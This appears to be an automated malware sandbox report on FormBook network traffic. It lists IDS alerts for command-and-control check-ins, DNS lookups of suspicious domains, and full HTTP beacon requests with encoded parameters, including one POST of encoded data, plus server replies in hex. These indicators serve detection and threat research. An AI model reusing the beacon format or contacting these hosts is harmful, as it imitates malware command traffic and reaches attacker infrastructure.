Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49987 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49989 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50012 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50032 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49998 -> 13.248.169.48:80
                Source: DNS query: www.031235246.xyz
                Source: DNS query: www.autonomousrich.xyz
                Source: DNS query: www.matindi.xyz
                Source: DNS query: www.ticquan.xyz
                Source: DNS query: www.infiniteture.xyz
Source: Joe Sandbox View | IP Address: 144.76.229.203
Source: Joe Sandbox View | IP Address: 192.64.118.221
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (15 occurrences)
Source: global traffic | HTTP traffic detected:
GET /15wz/?gbp=5DC0NPr0EBEhl&b8IlRP=piO7XCC2YmKS4YtLVhgLAvm+twzbDWYf7PZHrZKDycC9y9nN9+t6WNQPFH0EYcFR34CLkg9qv4+kt5RF0iDFrrij6KhFBhF5+/8gRzZ/dGtqBwF0Kkp7fA4= HTTP/1.1
Host: www.lianlianzhibo.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /nuh1/?b8IlRP=PT/Ri4D8ihmWAKE0f4NA7MEkC+uLqjrnSrrDt4x1YcaGjVH70R7UhsP/yKGt9M7P52nh3xjLyG+pcovynSdHpQva79L2h5iAclNW7PrvexwutIXY5aImFg0=&gbp=5DC0NPr0EBEhl HTTP/1.1
Host: www.sparkletime.cloud
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /3vjo/?b8IlRP=6k9lLSNDGifT99NSvg262I8Aatg5jOrBwRRsha+HOdKf/l5JGDaKR/CuPi+Z1+bjHWDBBIKPc/MMnzeWNqXAAA9zsXDxn6npKV+gAtA/NKidJOychD1T8Dw=&gbp=5DC0NPr0EBEhl HTTP/1.1
Host: www.actpisalnplay.cyou
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /an37/?b8IlRP=EOo17e0b13RAPxLblUgE3vs/FGL0H2xQV++ddtKGVI4dgn5cY1anvW0mUjQ935dHimnK6XuAvySysVP8xdezNg5a6QtKc14a9RVleSg6ym/yobsLmIbuxYM=&gbp=5DC0NPr0EBEhl HTTP/1.1
Host: www.031235246.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /extg/?gbp=5DC0NPr0EBEhl&b8IlRP=FWqvS2oQh4eVVjLTwqHOiP1/ZDahyJOFPrLBskdMkfQ4EQGcFlX+4xYLIEJWX9Ikcmr6BUKh66LrzwmKZjSB5f7zwe5yFNVHqzMKLEp7PHQACGHtm1Dj0PI= HTTP/1.1
Host: www.82765.ltd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /0vxe/?b8IlRP=JQt81xJGwNtvop68vs3oOoN0expppVASX38FmJiMtBKjk/hrICJT6K1Qnarg/abexvbKITAwf81qmJty25MRXZO87BMrs3iwFxp+PAcV8X+OCc4J/lvZOGY=&gbp=5DC0NPr0EBEhl HTTP/1.1
Host: www.autonomousrich.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /76gg/?gbp=5DC0NPr0EBEhl&b8IlRP=f0r08WmvNyVCfCqKC3sc1J1ZeQ6U1v9y7p/LEdN+4XLKv+17b1TeDuaoBNvKJPqQeDpBKFonIAKhR62hl2CkpAb13j5kgbM3Z1EpoWTo5xPykT+M3IwkhCo= HTTP/1.1Host: www.matindi.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /x261/?b8IlRP=omr8Uf0LWdGuNzd/Unp1GqS1vL4CND7gEoBxRp9qerI7RqKhJhDnpmgwn7Xoqkkia3wcWkhTca7DU/K5obCzEqDdMokToPWzu0j+vKnG1IJFcLDgw+mr9qA=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.ticquan.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /uq6t/?b8IlRP=iD8Otn+glfhqFyVIWbF8JwloVNr+WXnKgGNoSp+HX6ROb+ECQxDeonr99y/OKnAMRMxQ6B5OBd24JHLYKUCPAhLQfJkzvD/02LRBaqogd+vNbbcZEYHIetY=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.christmas-goods.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /u65q/?b8IlRP=pWvJsEH+VbkHT1A3bH4UYEWOlkjauqNRGqS5aYrS7rL8do5jDo02FNcjHW0uLgFLzOtKHmLLzofTR7Xd+MAlmpQXCj2salgDXLWGs7GXn7OxkiDpJp4HwA4=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.infiniteture.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /72e1/?gbp=5DC0NPr0EBEhl&b8IlRP=GAwPJ2y3utP2ohmBjxJQ4YKR4a5ZSZwwUjgEd0RFRLhwJQk7ldoPr0N9YZF0OFh8/8cxs0GCaqpBUanGilFHC4Yq6Ji7ZQ8xsir8gpwRswpFhpwbRQyajkI= HTTP/1.1Host: www.fluffymooncat.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1hqx/?b8IlRP=ZLrw+Pq3MAwYsBOK5aec2k9VcgoVTWhUmUFDAd6oEVMHtXmwVeeiiz1QtAZkDwNggiXkqMWrizc2pYhIMWZKEZsXYXcBEGZEl08wfQ3E51qTkAAzX1VYJOI=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.gnlokn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ewie/?gbp=5DC0NPr0EBEhl&b8IlRP=my2IJ9iTWNCQH18wFR7iA61h7l7u8ZRiCK/mim8iFRXc0x4FKu98LnX5lCdpWA5MM9eNg9jeKK6hMTOzyiUoKt19nKriHuDZ9IpFV9Da/610wEIVGPiRZ6A= HTTP/1.1Host: www.intention.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /nezi/?b8IlRP=vCzlhCkc61s8QnR1Eovjjze9/iXZVbS/FWCYnySni7Jw2oCHvVBRwsihdO8bPjl7D4ns/Q3JWrxkv+cbXIJDzSElp59oyMz46hYTghou/wYwly8Y8rMwujA=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.kakupi.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.lianlianzhibo.net
                Source: global trafficDNS traffic detected: DNS query: www.sparkletime.cloud
                Source: global trafficDNS traffic detected: DNS query: www.actpisalnplay.cyou
                Source: global trafficDNS traffic detected: DNS query: www.031235246.xyz
                Source: global trafficDNS traffic detected: DNS query: www.82765.ltd
                Source: global trafficDNS traffic detected: DNS query: www.autonomousrich.xyz
                Source: global trafficDNS traffic detected: DNS query: www.matindi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.ticquan.xyz
                Source: global trafficDNS traffic detected: DNS query: www.christmas-goods.store
                Source: global trafficDNS traffic detected: DNS query: www.infiniteture.xyz
                Source: global trafficDNS traffic detected: DNS query: www.fluffymooncat.fun
                Source: global trafficDNS traffic detected: DNS query: www.gnlokn.info
                Source: global trafficDNS traffic detected: DNS query: www.intention.digital
                Source: global trafficDNS traffic detected: DNS query: www.kakupi.info
                Source: unknownHTTP traffic detected: POST /nuh1/ HTTP/1.1Host: www.sparkletime.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-USCache-Control: max-age=0Content-Length: 203Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.sparkletime.cloudReferer: http://www.sparkletime.cloud/nuh1/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36Data Raw: 62 38 49 6c 52 50 3d 43 52 58 78 68 4f 50 41 75 42 71 36 4e 5a 30 35 66 66 59 61 6d 64 78 58 56 4f 6d 4b 39 77 6e 52 52 71 65 51 75 71 56 49 4e 4e 2b 4d 6c 56 66 65 73 79 48 55 2b 72 53 63 33 5a 75 43 78 4d 2f 50 71 6b 6d 46 31 51 7a 42 35 68 79 37 57 59 2f 4f 69 6b 6c 4c 75 68 58 4f 6f 66 6d 33 71 62 61 6b 4a 6b 55 56 31 75 33 6f 52 69 6b 33 6a 4a 48 55 37 70 49 49 5a 68 6c 39 45 56 75 6f 2b 61 50 6c 62 53 61 30 72 41 43 41 44 61 37 52 4a 46 45 30 45 36 57 7a 59 46 50 37 64 4d 58 34 32 57 34 7a 58 53 51 33 34 55 33 32 2b 34 4d 33 55 38 73 68 72 7a 38 4f 4b 2b 4f 48 65 49 51 75 32 55 34 4c 66 67 3d 3d Data Ascii: b8IlRP=CRXxhOPAuBq6NZ05ffYamdxXVOmK9wnRRqeQuqVINN+MlVfesyHU+rSc3ZuCxM/PqkmF1QzB5hy7WY/OiklLuhXOofm3qbakJkUV1u3oRik3jJHU7pIIZhl9EVuo+aPlbSa0rACADa7RJFE0E6WzYFP7dMX42W4zXSQ34U32+4M3U8shrz8OK+OHeIQu2U4Lfg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:35 GMTServer: ApacheContent-Length: 267Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 70 61 72 6b 6c 65 74 69 6d 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.sparkletime.cloud Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:38 GMTServer: ApacheContent-Length: 267Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 70 61 72 6b 6c 65 74 69 6d 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.sparkletime.cloud Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:40 GMTServer: ApacheContent-Length: 267Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 70 61 72 6b 6c 65 74 69 6d 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.sparkletime.cloud Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:43 GMTServer: ApacheContent-Length: 267Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 70 61 72 6b 6c 65 74 69 6d 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.sparkletime.cloud Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 04 Nov 2024 08:53:38 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CxtpaA2G%2BUAJBH0MQtO6iHI7gZ75aqgtD2qOuc6p%2Boq1CLAIIApwtHFLFQYRSsvOeEshfwFPpBx5Q0qPFGowLLAMv2sTvHPdAxzqYlLsvOCspKwwWml7qqnRd9Q%2FpLoKv7jEuYmcActj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90d98a3e8d9842be-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1667&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=807&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 ef 6f db 36 10 fd 9e bf e2 a6 62 43 07 54 a6 65 a7 4d 2d c9 02 32 3b c1 0a 74 6d d0 ba d8 fa 91 11 4f 22 6b 89 d4 c8 b3 6c 35 d8 ff 3e 50 52 6c 07 db 8a 61 18 f5 85 ba 7b f7 de f1 c7 63 fa dd fa fd 6a f3 f9 ee 06 24 d5 15 dc 7d fa e9 ed 9b 15 04 21 63 bf ce 57 8c ad 37 6b f8 ed e7 cd 2f 6f 21 9a 4c e1 23 59 95 13 63 37 ef 02 08 24 51 13 33 b6 df ef 27 fb f9 c4 d8 92 6d 3e b0 83 67 89 7c d9 38 0d 5d 5f 33 11 24 82 ec 22 ed 45 0e 75 a5 dd f2 6f 08 a2 c5 62 31 d4 05 1e 14 57 5c 97 cb 00 75 00 c7 59 96 4a e4 22 bb 00 00 48 49 51 85 d9 e5 f4 12 7e a8 05 77 32 81 77 86 e0 d6 ec b4 48 d9 90 1c 80 35 12 07 af 17 e2 ef 3b d5 2e 83 95 d1 84 9a c2 4d d7 60 00 f9 f0 b7 0c 08 0f c4 bc 7e 02 b9 e4 d6 21 2d 3f 6d 6e c3 d7 01 3b 27 d2 bc c6 65 20 d0 e5 56 35 a4 8c 3e 63 f8 68 ac ed 5e 40 c3 4b 04 6d 08 0a df cc b1 dc 51 57 21 50 d7 e0 a8 95 3b 17 0c 39 3f ee 8d e8 e0 a1 30 9a 42 a7 be 62 1c 5d 36 87 04 72 53 19 1b 3f bb ea 47 02 7d ba e0 b5 aa ba 98 5b c5 ab 04 3c 55 c8 2b 55 ea 38 47 4d 68 93 3f 8e 9c 32 7a c2 f8 7a 7a 46 b9 58 5c 5f 5d df 26 50 73 5b 2a Data Ascii: 2ecTo6bCTeM-2;tmO"kl5>PRla{cj$}!cW7k/o!L#Yc7$Q3'm>g|8]_3$"Euob1W\uYJ"HIQ~w2wH5;.M`~!-?mn;'e V5>ch^@KmQW!P;9?0Bb]6rS?G}[<U+U8GMh?2zzzFX\_]&Ps[*
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 04 Nov 2024 08:53:38 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cJDV%2B1jd%2FX1hvT51xQ7ZRyzmxD7zwWzzaMqG7WCZmciL7i3xjMhQfwzh8kvEDGo1H6EMYmplG%2BkAghzJaIP0ub9ZIj2QJjtWL1IlfxQxTWfC4XZogIQheIdzVdO78YUlDGef%2FKuYkqRU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90d98a4e8a6542af-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1663&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=827&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 ef 6f db 36 10 fd 9e bf e2 a6 62 43 07 54 a6 65 a7 4d 2d c9 02 32 3b c1 0a 74 6d d0 ba d8 fa 91 11 4f 22 6b 89 d4 c8 b3 6c 35 d8 ff 3e 50 52 6c 07 db 8a 61 18 f5 85 ba 7b f7 de f1 c7 63 fa dd fa fd 6a f3 f9 ee 06 24 d5 15 dc 7d fa e9 ed 9b 15 04 21 63 bf ce 57 8c ad 37 6b f8 ed e7 cd 2f 6f 21 9a 4c e1 23 59 95 13 63 37 ef 02 08 24 51 13 33 b6 df ef 27 fb f9 c4 d8 92 6d 3e b0 83 67 89 7c d9 38 0d 5d 5f 33 11 24 82 ec 22 ed 45 0e 75 a5 dd f2 6f 08 a2 c5 62 31 d4 05 1e 14 57 5c 97 cb 00 75 00 c7 59 96 4a e4 22 bb 00 00 48 49 51 85 d9 e5 f4 12 7e a8 05 77 32 81 77 86 e0 d6 ec b4 48 d9 90 1c 80 35 12 07 af 17 e2 ef 3b d5 2e 83 95 d1 84 9a c2 4d d7 60 00 f9 f0 b7 0c 08 0f c4 bc 7e 02 b9 e4 d6 21 2d 3f 6d 6e c3 d7 01 3b 27 d2 bc c6 65 20 d0 e5 56 35 a4 8c 3e 63 f8 68 ac ed 5e 40 c3 4b 04 6d 08 0a df cc b1 dc 51 57 21 50 d7 e0 a8 95 3b 17 0c 39 3f ee 8d e8 e0 a1 30 9a 42 a7 be 62 1c 5d 36 87 04 72 53 19 1b 3f bb ea 47 02 7d ba e0 b5 aa ba 98 5b c5 ab 04 3c 55 c8 2b 55 ea 38 47 4d 68 93 3f 8e 9c 32 7a c2 f8 7a 7a 46 b9 58 5c 5f 5d df 26 50 73 Data Ascii: 2ecTo6bCTeM-2;tmO"kl5>PRla{cj$}!cW7k/o!L#Yc7$Q3'm>g|8]_3$"Euob1W\uYJ"HIQ~w2wH5;.M`~!-?mn;'e V5>ch^@KmQW!P;9?0Bb]6rS?G}[<U+U8GMh?2zzzFX\_]&Ps
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 04 Nov 2024 08:53:38 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BDz29ol4Zq%2BXIXmbpT0IwQfUjd%2FKXryGPBazLv9CwOQ3j1NstzNM9%2BfUiI7qEvv%2BwJzSbZSykGoG0TWVf3bGXl2xNuV%2Fv%2BjWTDcuQSHszRY4O%2Fo85fiJCRBCcUnrPC0wDYRrGx6XWsns"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90d98a5e5ab2c477-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1634&rtt_var=817&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1840&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 65 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 ef 6f db 36 10 fd 9e bf e2 a6 62 43 07 54 a6 65 a7 4d 2d c9 02 32 3b c1 0a 74 6d d0 ba d8 fa 91 11 4f 22 6b 89 d4 c8 b3 6c 35 d8 ff 3e 50 52 6c 07 db 8a 61 18 f5 85 ba 7b f7 de f1 c7 63 fa dd fa fd 6a f3 f9 ee 06 24 d5 15 dc 7d fa e9 ed 9b 15 04 21 63 bf ce 57 8c ad 37 6b f8 ed e7 cd 2f 6f 21 9a 4c e1 23 59 95 13 63 37 ef 02 08 24 51 13 33 b6 df ef 27 fb f9 c4 d8 92 6d 3e b0 83 67 89 7c d9 38 0d 5d 5f 33 11 24 82 ec 22 ed 45 